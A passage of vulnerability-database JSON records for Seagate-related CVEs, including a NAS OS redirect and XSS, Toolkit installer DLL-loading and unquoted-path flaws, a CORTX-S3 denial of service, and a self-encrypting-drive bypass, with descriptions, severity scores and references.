                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the \u0027state\u0027 URL parameter."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12300",
        "datePublished": "2019-05-13T12:36:58.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.824Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-12299 (GCVE-0-2018-12299)

    Vulnerability from nvd – Published: 2019-05-13 12:35 – Updated: 2024-08-05 08:30
    VLAI
    Summary
    Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:30:59.654Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-05-13T12:35:33.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2018-12299",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting in filebrowser in Seagate NAS OS version 4.3.15.1 allows attackers to execute JavaScript via uploaded file names."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170",
                  "refsource": "MISC",
                  "url": "https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2018-12299",
        "datePublished": "2019-05-13T12:35:33.000Z",
        "dateReserved": "2018-06-13T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:30:59.654Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2025-9267 (GCVE-0-2025-9267)

    Vulnerability from cvelistv5 – Published: 2025-09-26 12:27 – Updated: 2025-09-29 14:37
    VLAI
    Summary
    In Seagate Toolkit on Windows, a vulnerability exists in the Toolkit Installer prior to version 2.35.0.6: the installer attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-427 - Uncontrolled Search Path Element
    • CWE-426 - Untrusted Search Path
    Assigner
    Impacted products
    Vendor Product Version
    Seagate Toolkit Affected: 0 , < 2.35.0.6 (custom)

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-9267",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-09-26T12:54:52.245929Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-09-26T12:54:57.812Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2025-09-29T14:37:53.583Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "https://github.com/Tiger3080/CVE-2025-9267"
              }
            ],
            "title": "CVE Program Container",
            "x_generator": {
              "engine": "ADPogram 0.0.1"
            }
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "platforms": [
                "Windows"
              ],
              "product": "Toolkit",
              "vendor": "Seagate",
              "versions": [
                {
                  "lessThan": "2.35.0.6",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cspan style=\"background-color: rgb(252, 252, 252);\"\u003eIn Seagate Toolkit on Windows a\u0026nbsp;vulnerability exists in the Toolkit Installer prior to\u0026nbsp;versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries.\n\n\u003c/span\u003e\u003cbr\u003e"
                }
              ],
              "value": "In Seagate Toolkit on Windows a\u00a0vulnerability exists in the Toolkit Installer prior to\u00a0versions 2.35.0.6 where it attempts to load DLLs from the current working directory without validating their origin or integrity. This behavior can be exploited by placing a malicious DLL in the same directory as the installer executable, leading to arbitrary code execution with the privileges of the user running the installer. The issue stems from the use of insecure DLL loading practices, such as relying on relative paths or failing to specify fully qualified paths when invoking system libraries."
            }
          ],
          "impacts": [
            {
              "capecId": "CAPEC-471",
              "descriptions": [
                {
                  "lang": "en",
                  "value": "CAPEC-471 Search Order Hijacking"
                }
              ]
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 7,
                "baseSeverity": "HIGH",
                "privilegesRequired": "HIGH",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "PASSIVE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "HIGH",
                "vulnConfidentialityImpact": "HIGH",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-427",
                  "description": "CWE-427 Uncontrolled Search Path Element",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-426",
                  "description": "CWE-426 Untrusted Search Path",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-09-26T12:27:51.651Z",
            "orgId": "c6156efd-4bd0-48d7-8520-680200527478",
            "shortName": "Seagate"
          },
          "references": [
            {
              "url": "https://www.seagate.com/product-security/#security-advisories"
            },
            {
              "url": "https://www.seagate.com/support/software/toolkit/"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
        "assignerShortName": "Seagate",
        "cveId": "CVE-2025-9267",
        "datePublished": "2025-09-26T12:27:51.651Z",
        "dateReserved": "2025-08-20T14:44:11.379Z",
        "dateUpdated": "2025-09-29T14:37:53.583Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2025-9043 (GCVE-0-2025-9043)

    Vulnerability from cvelistv5 – Published: 2025-08-14 16:27 – Updated: 2025-08-21 14:16
    VLAI
    Summary
    The service executable path in Seagate Toolkit versions prior to 2.34.0.33 on Windows is unquoted (CWE-428: Unquoted Search Path or Element), which an attacker with Admin privileges can exploit. An attacker with write permission to the root directory could place a malicious Program.exe file there, which would execute with SYSTEM privileges.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-428 - Unquoted Search Path or Element
    Assigner
    Impacted products
    Vendor Product Version
    Seagate Toolkit Affected: 0 , < 2.34.0.33 (custom)

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2025-9043",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2025-08-14T18:42:31.162132Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2025-08-14T19:21:59.342Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2025-08-21T14:16:46.354Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "timeline": [
              {
                "lang": "en",
                "time": "2025-08-21T14:16:46.266Z",
                "value": "Previously entered references were removed because they are not applicable to this CVE Record."
              }
            ],
            "title": "CVE Program Container",
            "x_generator": {
              "engine": "ADPogram 0.0.1"
            }
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "platforms": [
                "Windows"
              ],
              "product": "Toolkit",
              "vendor": "Seagate",
              "versions": [
                {
                  "lessThan": "2.34.0.33",
                  "status": "affected",
                  "version": "0",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
                }
              ],
              "value": "The service executable path in Seagate Toolkit on Versions prior to 2.34.0.33 on Windows allows an attacker with Admin privileges to exploit a vulnerability as classified under CWE-428: Unquoted Search Path or Element. An attacker with write permissions to the root could place a malicious Program.exe file, which would execute with SYSTEM privileges."
            }
          ],
          "metrics": [
            {
              "cvssV4_0": {
                "Automatable": "NOT_DEFINED",
                "Recovery": "NOT_DEFINED",
                "Safety": "NOT_DEFINED",
                "attackComplexity": "LOW",
                "attackRequirements": "NONE",
                "attackVector": "LOCAL",
                "baseScore": 6.7,
                "baseSeverity": "MEDIUM",
                "privilegesRequired": "HIGH",
                "providerUrgency": "NOT_DEFINED",
                "subAvailabilityImpact": "NONE",
                "subConfidentialityImpact": "NONE",
                "subIntegrityImpact": "NONE",
                "userInteraction": "NONE",
                "valueDensity": "NOT_DEFINED",
                "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
                "version": "4.0",
                "vulnAvailabilityImpact": "NONE",
                "vulnConfidentialityImpact": "NONE",
                "vulnIntegrityImpact": "HIGH",
                "vulnerabilityResponseEffort": "NOT_DEFINED"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-428",
                  "description": "CWE-428 Unquoted Search Path or Element",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2025-08-21T14:04:46.566Z",
            "orgId": "c6156efd-4bd0-48d7-8520-680200527478",
            "shortName": "Seagate"
          },
          "references": [
            {
              "url": "https://www.seagate.com/support/software/toolkit/"
            },
            {
              "url": "https://www.seagate.com/product-security/#security-advisories"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "x_generator": {
            "engine": "Vulnogram 0.2.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "c6156efd-4bd0-48d7-8520-680200527478",
        "assignerShortName": "Seagate",
        "cveId": "CVE-2025-9043",
        "datePublished": "2025-08-14T16:27:05.364Z",
        "dateReserved": "2025-08-14T15:57:53.887Z",
        "dateUpdated": "2025-08-21T14:16:46.354Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-43429 (GCVE-0-2021-43429)

    Vulnerability from cvelistv5 – Published: 2022-04-07 16:52 – Updated: 2024-08-04 03:55
    VLAI
    Summary
    A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failure to release the lock pool->lock.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    References

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T03:55:28.993Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-04-07T16:52:25.000Z",
            "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            "shortName": "mitre"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cve@mitre.org",
              "ID": "CVE-2021-43429",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "A Denial of Service vulnerability exists in CORTX-S3 Server as of 11/7/2021 via the mempool_destroy method due to a failture to release locks pool-\u003elock."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://github.com/Seagate/cortx-s3server/issues/1037",
                  "refsource": "MISC",
                  "url": "https://github.com/Seagate/cortx-s3server/issues/1037"
                },
                {
                  "name": "https://github.com/Seagate/cortx-s3server/pull/1041",
                  "refsource": "MISC",
                  "url": "https://github.com/Seagate/cortx-s3server/pull/1041"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "assignerShortName": "mitre",
        "cveId": "CVE-2021-43429",
        "datePublished": "2022-04-07T16:52:25.000Z",
        "dateReserved": "2021-11-08T00:00:00.000Z",
        "dateUpdated": "2024-08-04T03:55:28.993Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    VAR-201711-0015

    Vulnerability from variot - Updated: 2025-04-20 23:32

    Samsung 850 Pro and PM851 solid-state drives and Seagate ST500LT015 and ST500LT025 hard disk drives, when in sleep mode and operating in Opal or eDrive mode on Lenovo ThinkPad T440s laptops with BIOS 2.32; ThinkPad W541 laptops with BIOS 2.21; Dell Latitude E6410 laptops with BIOS A16; or Latitude E6430 laptops with BIOS A16, allow physically proximate attackers to bypass self-encrypting drive (SED) protection by leveraging failure to detect when SATA drives are unplugged in Sleep Mode, aka a "Hot Plug attack." Samsung 850 Pro/PM851 solid-state drives and Seagate ST500LT015/ST500LT025 hard disk drives contain a vulnerability that allows security functions to be bypassed. Information may be obtained. The Lenovo ThinkPad T440s is a laptop from Lenovo China. The Dell Latitude E6410 is a laptop from Dell. The Samsung 850 Pro, etc. are all hard drives used in laptops. The Samsung 850 Pro is a hard disk manufactured by Samsung in South Korea. The Seagate ST500LT015 is a hard drive manufactured by Seagate. There are security holes in the Samsung 850 Pro, PM851 SSD, Seagate ST500LT015 and ST500LT025 hard drives on several devices. An attacker could exploit this vulnerability to bypass self-encrypting hard disk (SED) protection. Samsung/Seagate Self-Encrypting Drive Protection is prone to a local security-bypass vulnerability. This may aid in further attacks. The following products are vulnerable: Seagate ST500LT015 and ST500LT025; Samsung 850 Pro and PM851. Samsung 850 Pro etc. The following products are affected: Lenovo ThinkPad T440s laptop using BIOS version 2.32; ThinkPad W541 laptop using BIOS version 2.21; Dell Latitude E6410 laptop using BIOS version A16; Latitude E6430 laptop using BIOS version A16


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201711-0015",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "pm851",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "850 pro",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "pm851",
            "scope": null,
            "trust": 1.4,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt015",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "850 pro",
            "scope": null,
            "trust": 0.8,
            "vendor": "samsung",
            "version": null
          },
          {
            "model": "pro",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "samsung",
            "version": "850"
          },
          {
            "model": "technology st500lt015",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "technology st500lt025",
            "scope": null,
            "trust": 0.6,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "st500lt025",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "0"
          },
          {
            "model": "st500lt015",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "0"
          },
          {
            "model": "pm851",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "samsung",
            "version": "0"
          },
          {
            "model": "pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "samsung",
            "version": "8500"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "BID",
            "id": "102336"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:seagate:st500lt015_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:seagate:st500lt025_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:samsung:850_pro_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:samsung:pm851_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Daniel Boteanu and Kevvie Fowler of KPMG.",
        "sources": [
          {
            "db": "BID",
            "id": "102336"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-7267",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "CVE-2015-7267",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 1.8,
                "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "CNVD-2017-38305",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 1.9,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.4,
                "id": "VHN-85228",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:L/AC:M/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "PHYSICAL",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.2,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 0.5,
                "id": "CVE-2015-7267",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-7267",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2015-7267",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-38305",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201711-1082",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "VULHUB",
                "id": "VHN-85228",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38305"
          },
          {
            "db": "VULHUB",
            "id": "VHN-85228"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-008068"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201711-1082"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-7267"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
